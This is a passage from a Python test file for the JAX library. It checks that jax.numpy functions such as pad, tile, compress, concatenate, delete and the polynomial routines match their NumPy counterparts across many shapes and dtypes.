self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.array(1.234, jnp.float32), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.array(1.234, jnp.float32)),
check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_padwidth={}_constantvalues={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width,
constant_values),
"shape": shape, "dtype": dtype, "mode": mode,
"pad_width": pad_width, "constant_values": constant_values}
for mode, shapes in [
('constant', all_shapes),
('wrap', nonempty_shapes),
('edge', nonempty_shapes),
]
for shape, dtype in _shape_and_dtypes(shapes, all_dtypes)
for constant_values in [
# None is used for modes other than 'constant'
None,
# constant
0, 1,
# (constant,)
(0,), (2.718,),
# ((before_const, after_const),)
((0, 2),), ((-1, 3.14),),
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i / 2, -3.14 * i) for i in range(len(shape))),
]
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
if (pad_width != () and constant_values != () and
((mode == 'constant' and constant_values is not None) or
(mode != 'constant' and constant_values is None)))))
def testPad(self, shape, dtype, mode, pad_width, constant_values):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
if constant_values is None:
np_fun = partial(np.pad, pad_width=pad_width, mode=mode)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode)
else:
np_fun = partial(np.pad, pad_width=pad_width, mode=mode,
constant_values=constant_values)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode,
constant_values=constant_values)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_stat_length={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, stat_length),
"shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
"stat_length": stat_length}
for mode in ['maximum', 'minimum', 'mean', 'median']
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
for stat_length in [
None,
# ((before_1, after_1), ..., (before_N, after_N))
tuple(((i % 3 + 1), ((i + 1) % 3) + 1) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 2),),
# (before, after) (not in the docstring but works in numpy)
(1, 1), (3, 4),
# (pad,)
(1,), (2,),
# pad
1, 2
]
if (pad_width != () and stat_length != () and
not (dtype in bool_dtypes and mode == 'mean'))))
def testPadStatValues(self, shape, dtype, mode, pad_width, stat_length):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_reflect_type={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, reflect_type),
"shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
"reflect_type": reflect_type}
for mode in ['symmetric', 'reflect']
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 3),),
# (before, after) (not in the docstring but works in numpy)
(2, 1), (1, 2),
# (pad,)
(1,), (2,), (3,),
# pad
0, 5, 7, 10
]
for reflect_type in ['even', 'odd']
if (pad_width != () and
# following types lack precision when calculating odd values
(reflect_type != 'odd' or dtype not in [np.bool_, np.float16, jnp.bfloat16]))))
def testPadSymmetricAndReflect(self, shape, dtype, mode, pad_width, reflect_type):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE,
tol={np.float32: 1e-3, np.complex64: 1e-3})
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_end_values={}".format(
jtu.format_shape_dtype_string(shape, dtype), "linear_ramp", pad_width, end_values),
"shape": shape, "dtype": dtype, "pad_width": pad_width,
"end_values": end_values}
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
for end_values in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2.0, 3.14),),
# (before, after) (not in the docstring but works in numpy)
(0, 0), (-8.0, 2.0),
# (end_values,)
(1,), (2,),
# end_values
0, 1, 100, 10.0, 3.5, 4.2, -5, -3
]
if (pad_width != () and end_values != () and
# following types lack precision
dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16])))
def testPadLinearRamp(self, shape, dtype, pad_width, end_values):
if numpy_version < (1, 20) and np.issubdtype(dtype, np.integer):
raise unittest.SkipTest("NumPy 1.20 changed the semantics of np.linspace")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode="linear_ramp",
end_values=end_values)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode="linear_ramp",
end_values=end_values)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
def testPadEmpty(self):
arr = np.arange(6).reshape(2, 3)
pad_width = ((2, 3), (3, 1))
np_res = np.pad(arr, pad_width=pad_width, mode="empty")
jnp_res = jnp.pad(arr, pad_width=pad_width, mode="empty")
np.testing.assert_equal(np_res.shape, jnp_res.shape)
np.testing.assert_equal(arr, np_res[2:-3, 3:-1])
np.testing.assert_equal(arr, jnp_res[2:-3, 3:-1])
np.testing.assert_equal(np_res[2:-3, 3:-1], jnp_res[2:-3, 3:-1])
def testPadKwargs(self):
modes = {
'constant': {'constant_values': 0},
'edge': {},
'linear_ramp': {'end_values': 0},
'maximum': {'stat_length': None},
'mean': {'stat_length': None},
'median': {'stat_length': None},
'minimum': {'stat_length': None},
'reflect': {'reflect_type': 'even'},
'symmetric': {'reflect_type': 'even'},
'wrap': {},
'empty': {}
}
arr = jnp.array([1, 2, 3])
pad_width = 1
for mode in modes.keys():
allowed = modes[mode]
not_allowed = {}
for kwargs in modes.values():
if kwargs != allowed:
not_allowed.update(kwargs)
# Test if allowed keyword arguments pass
jnp.pad(arr, pad_width, mode, **allowed)
# Test if prohibited keyword arguments of other modes raise an error
match = "unsupported keyword arguments for mode '{}'".format(mode)
for key, value in not_allowed.items():
with self.assertRaisesRegex(ValueError, match):
jnp.pad(arr, pad_width, mode, **{key: value})
# Test if unsupported mode raise error.
unsupported_modes = [1, None, "foo"]
for mode in unsupported_modes:
match = "Unimplemented padding mode '{}' for np.pad.".format(mode)
with self.assertRaisesRegex(NotImplementedError, match):
jnp.pad(arr, pad_width, mode)
def testPadFunction(self):
def np_pad_with(vector, pad_width, iaxis, kwargs):
pad_value = kwargs.get('padder', 10)
vector[:pad_width[0]] = pad_value
vector[-pad_width[1]:] = pad_value
def jnp_pad_with(vector, pad_width, iaxis, kwargs):
pad_value = kwargs.get('padder', 10)
vector = jax.ops.index_update(
vector, jax.ops.index[:pad_width[0]], pad_value)
vector = jax.ops.index_update(
vector, jax.ops.index[-pad_width[1]:], pad_value)
return vector
arr = np.arange(6).reshape(2, 3)
np_res = np.pad(arr, 2, np_pad_with)
jnp_res = jnp.pad(arr, 2, jnp_pad_with)
np.testing.assert_equal(np_res, jnp_res)
arr = np.arange(24).reshape(2, 3, 4)
np_res = np.pad(arr, 1, np_pad_with, padder=100)
jnp_res = jnp.pad(arr, 1, jnp_pad_with, padder=100)
np.testing.assert_equal(np_res, jnp_res)
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(arr.shape, arr.dtype)]
jnp_fun = partial(jnp.pad, pad_width=1, mode=jnp_pad_with)
self._CompileAndCheck(jnp_fun, args_maker)
def testPadWithNumpyPadWidth(self):
a = jnp.array([1, 2, 3, 4, 5])
f = jax.jit(
partial(
jnp.pad,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
np.testing.assert_array_equal(
f(a),
np.pad(
a,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape=[{}]_reps={}".format(
jtu.format_shape_dtype_string(shape, dtype), reps),
"shape": shape, "dtype": dtype, "reps": reps}
for reps in [(), (2,), (3, 4), (2, 3, 4), (1, 0, 2)]
for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
))
def testTile(self, shape, dtype, reps):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.tile(arg, reps)
jnp_fun = lambda arg: jnp.tile(arg, reps)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes
for dtype in all_dtypes))
def testExtract(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, jnp.float32), rng(shape, dtype)]
self._CheckAgainstNumpy(np.extract, jnp.extract, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_ncond={}_nfunc={}".format(
jtu.format_shape_dtype_string(shape, dtype), ncond, nfunc),
"shape": shape, "dtype": dtype, "ncond": ncond, "nfunc": nfunc}
for ncond in [1, 2, 3]
for nfunc in [ncond, ncond + 1]
for shape in all_shapes
for dtype in all_dtypes))
def testPiecewise(self, shape, dtype, ncond, nfunc):
rng = jtu.rand_default(self.rng())
rng_bool = jtu.rand_int(self.rng(), 0, 2)
funclist = [lambda x: x - 1, 1, lambda x: x, 0][:nfunc]
args_maker = lambda: (rng(shape, dtype), [rng_bool(shape, bool) for i in range(ncond)])
np_fun = partial(np.piecewise, funclist=funclist)
jnp_fun = partial(jnp.piecewise, funclist=funclist)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
# This is a higher-order function, so the cache miss check will fail.
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True, check_cache_misses=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_perm={}_{}".format(
jtu.format_shape_dtype_string(shape, dtype), perm, arg_type),
"dtype": dtype, "shape": shape, "perm": perm, "arg_type": arg_type}
for dtype in default_dtypes
for shape in array_shapes
for arg_type in ["splat", "value"]
for perm in [None, tuple(np.random.RandomState(0).permutation(np.zeros(shape).ndim))]))
def testTransposeTuple(self, shape, dtype, perm, arg_type):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
if arg_type == "value":
np_fun = lambda x: x.transpose(perm)
jnp_fun = lambda x: jnp.array(x).transpose(perm)
else:
np_fun = lambda x: x.transpose(*(perm or ()))
jnp_fun = lambda x: jnp.array(x).transpose(*(perm or ()))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_trim={}".format(
jtu.format_shape_dtype_string(a_shape, dtype), trim),
"dtype": dtype, "a_shape": a_shape, "trim": trim}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for trim in ["f", "b", "fb"]))
def testTrimZeros(self, a_shape, dtype, trim):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(a_shape, dtype)]
np_fun = lambda arg1: np.trim_zeros(arg1, trim)
jnp_fun = lambda arg1: jnp.trim_zeros(arg1, trim)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_rank{}".format(
jtu.format_shape_dtype_string(a_shape, dtype), rank),
"dtype": dtype, "a_shape": a_shape, "rank": rank}
for rank in (1, 2)
for dtype in default_dtypes
for a_shape in one_dim_array_shapes))
def testPoly(self, a_shape, dtype, rank):
if dtype in (np.float16, jnp.bfloat16, np.int16):
self.skipTest(f"{dtype} gets promoted to {np.float16}, which is not supported.")
elif rank == 2 and jtu.device_under_test() in ("tpu", "gpu"):
self.skipTest("Nonsymmetric eigendecomposition is only implemented on the CPU backend.")
rng = jtu.rand_default(self.rng())
tol = { np.int8: 1e-3, np.int32: 1e-3, np.float32: 1e-3, np.float64: 1e-6 }
if jtu.device_under_test() == "tpu":
tol[np.int32] = tol[np.float32] = 1e-1
tol = jtu.tolerance(dtype, tol)
args_maker = lambda: [rng(a_shape * rank, dtype)]
self._CheckAgainstNumpy(np.poly, jnp.poly, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp.poly, args_maker, check_dtypes=True, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "a_shape={} , b_shape={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
jtu.format_shape_dtype_string(b_shape, dtype)),
"dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for b_shape in one_dim_array_shapes))
def testPolyAdd(self, a_shape, b_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polyadd(arg1, arg2)
jnp_fun = lambda arg1, arg2: jnp.polyadd(arg1, arg2)
args_maker = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "a_shape={} , b_shape={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
jtu.format_shape_dtype_string(b_shape, dtype)),
"dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for b_shape in one_dim_array_shapes))
def testPolySub(self, a_shape, b_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polysub(arg1, arg2)
jnp_fun = lambda arg1, arg2: jnp.polysub(arg1, arg2)
args_maker = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}_k={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
order, k),
"dtype": dtype, "a_shape": a_shape, "order" : order, "k": k}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for order in range(5)
for k in [np.arange(order, dtype=dtype), np.ones(1, dtype), None]))
def testPolyInt(self, a_shape, order, k, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1: np.polyint(arg1, m=order, k=k)
jnp_fun = lambda arg1: jnp.polyint(arg1, m=order, k=k)
args_maker = lambda: [rng(a_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
order),
"dtype": dtype, "a_shape": a_shape, "order" : order}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for order in range(5)))
def testPolyDer(self, a_shape, order, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1: np.polyder(arg1, m=order)
jnp_fun = lambda arg1: jnp.polyder(arg1, m=order)
args_maker = lambda: [rng(a_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ptype={}".format(ptype), "ptype": ptype}
for ptype in ['int', 'np.int', 'jnp.int']))
def testIntegerPower(self, ptype):
p = {'int': 2, 'np.int': np.int32(2), 'jnp.int': jnp.int32(2)}[ptype]
jaxpr = api.make_jaxpr(partial(jnp.power, x2=p))(1)
eqns = jaxpr.jaxpr.eqns
self.assertLen(eqns, 1)
self.assertEqual(eqns[0].primitive, lax.integer_pow_p)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_y={}".format(x, y), "x": x, "y": y}
for x in [-1, 0, 1]
for y in [0, 32, 64, 128]))
def testIntegerPowerOverflow(self, x, y):
# Regression test for https://github.com/google/jax/issues/5987
args_maker = lambda: [x, y]
self._CheckAgainstNumpy(np.power, jnp.power, args_maker)
self._CompileAndCheck(jnp.power, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in all_shapes
for dtype in all_dtypes
for axis in [None] + list(range(len(shape)))))
def testCompress(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
if shape in scalar_shapes or len(shape) == 0:
cond_shape = (0,)
elif axis is None:
cond_shape = (prod(shape),)
else:
cond_shape = (shape[axis],)
args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
np_fun = partial(np.compress, axis=axis)
jnp_fun = partial(jnp.compress, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_condition=array[{}]_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), len(condition), axis),
"shape": shape, "dtype": dtype, "condition": condition, "axis": axis}
for shape in [(2, 3)]
for dtype in int_dtypes
# condition entries beyond axis size must be zero.
for condition in [[1], [1, 0, 0, 0, 0, 0, 0]]
for axis in [None, 0, 1]))
def testCompressMismatchedShapes(self, shape, dtype, condition, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [np.array(condition), rng(shape, dtype)]
np_fun = partial(np.compress, axis=axis)
jnp_fun = partial(jnp.compress, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(len(shape)))))
def testCompressMethod(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
if shape in scalar_shapes or len(shape) == 0:
cond_shape = (0,)
elif axis is None:
cond_shape = (prod(shape),)
else:
cond_shape = (shape[axis],)
args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
np_fun = lambda condition, x: np.compress(condition, x, axis=axis)
jnp_fun = lambda condition, x: x.compress(condition, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
axis, ",".join(str(d) for d in base_shape),
",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
"axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
for num_arrs in [3]
for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, num_arrs)
for base_shape in [(4,), (3, 4), (2, 3, 4)]
for axis in range(-len(base_shape)+1, len(base_shape))))
def testConcatenate(self, axis, base_shape, arg_dtypes):
rng = jtu.rand_default(self.rng())
wrapped_axis = axis % len(base_shape)
shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
def np_fun(*args):
args = [x if x.dtype != jnp.bfloat16 else x.astype(np.float32)
for x in args]
dtype = functools.reduce(jnp.promote_types, arg_dtypes)
return np.concatenate(args, axis=axis).astype(dtype)
jnp_fun = lambda *args: jnp.concatenate(args, axis=axis)
def args_maker():
return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in [(4, 1), (4, 3), (4, 5, 6)]
for dtype in all_dtypes
for axis in [None] + list(range(1 - len(shape), len(shape) - 1))))
def testConcatenateArray(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda x: np.concatenate(x, axis=axis)
jnp_fun = lambda x: jnp.concatenate(x, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testConcatenateAxisNone(self):
# https://github.com/google/jax/issues/3419
a = jnp.array([[1, 2], [3, 4]])
b = jnp.array([[5]])
jnp.concatenate((a, b), axis=None)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
axis, ",".join(str(d) for d in base_shape),
",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
"axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, 2)
for base_shape in [(4,), (3, 4), (2, 3, 4)]
for axis in range(-len(base_shape)+1, len(base_shape))))
def testAppend(self, axis, base_shape, arg_dtypes):
rng = jtu.rand_default(self.rng())
wrapped_axis = axis % len(base_shape)
shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
def np_fun(arr, values):
arr = arr.astype(np.float32) if arr.dtype == jnp.bfloat16 else arr
values = (values.astype(np.float32) if values.dtype == jnp.bfloat16
else values)
out = np.append(arr, values, axis=axis)
return out.astype(jnp.promote_types(*arg_dtypes))
jnp_fun = lambda arr, values: jnp.append(arr, values, axis=axis)
def args_maker():
return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_idx={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, idx),
"dtype": dtype, "shape": shape, "axis": axis, "idx": idx}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for idx in (range(-prod(shape), prod(shape))
if axis is None else
range(-shape[axis], shape[axis]))))
def testDeleteInteger(self, shape, dtype, idx, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, idx, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_slc={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, slc),
"dtype": dtype, "shape": shape, "axis": axis, "slc": slc}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for slc in [slice(None), slice(1, 3), slice(1, 5, 2)]))
def testDeleteSlice(self, shape, dtype, axis, slc):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, slc, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, slc, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_idx={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis,
jtu.format_shape_dtype_string(idx_shape, int)),
"dtype": dtype, "shape": shape, "axis": axis, "idx_shape": idx_shape}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for idx_shape in all_shapes))
def testDeleteIndexArray(self, shape, dtype, axis, idx_shape):
rng = jtu.rand_default(self.rng())
max_idx = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
# Previous to numpy 1.19, negative indices were ignored so we don't test this.
low = 0 if numpy_version < (1, 19, 0) else -max_idx
idx = jtu.rand_int(self.rng(), low=low, high=max_idx)(idx_shape, int)
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, idx, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@unittest.skipIf(numpy_version < (1, 19), "boolean mask not supported in numpy < 1.19.0")
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"dtype": dtype, "shape": shape, "axis": axis}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testDeleteMaskArray(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
mask_size = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
mask = jtu.rand_int(self.rng(), low=0, high=2)(mask_size, bool)
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, mask, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, mask, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_out_dims={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, out_dims),
"shape": shape, "dtype": dtype, "axis": axis, "out_dims": out_dims}
for shape in nonempty_array_shapes
for dtype in default_dtypes
for axis in range(-len(shape), len(shape))
for out_dims in [0, 1, 2]))
def testApplyAlongAxis(self, shape, dtype, axis, out_dims):
def func(x, out_dims):
if out_dims == 0:
return x.sum()
elif out_dims == 1:
return x * x[0]
elif out_dims == 2:
return x[:, None] + x[None, :]
else:
raise NotImplementedError(f"out_dims={out_dims}")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arr: np.apply_along_axis(func, axis, arr, out_dims=out_dims)
jnp_fun = lambda arr: jnp.apply_along_axis(func, axis, arr, out_dims=out_dims)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_func={}_keepdims={}_axes={}".format(
jtu.format_shape_dtype_string(shape, dtype),
func, keepdims, axes),
"shape": shape, "dtype": dtype, "func": func, "keepdims": keepdims, "axes": axes}
for shape in nonempty_shapes
for func in ["sum"]
for keepdims in [True, False]
for axes in itertools.combinations(range(len(shape)), 2)
# Avoid low-precision types in sum()
for dtype in default_dtypes if dtype not in [np.float16, jnp.bfloat16]))
def testApplyOverAxes(self, shape, dtype, func, keepdims, axes):
f = lambda x, axis: getattr(x, func)(axis=axis, keepdims=keepdims)
rng = jtu.rand_default(self.rng())
args_maker = lambda: (rng(shape, dtype),)
np_fun = lambda a: np.apply_over_axes(f, a, axes)
jnp_fun = lambda a: jnp.apply_over_axes(f, a, axes)
self._CompileAndCheck(jnp_fun, args_maker)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape=[{}]_axis={}_repeats={}_fixed_size={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, repeats, fixed_size),
"axis": axis, "shape": shape, "dtype": dtype, "repeats": repeats,
'fixed_size': fixed_size}
for repeats in [0, 1, 2]
for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
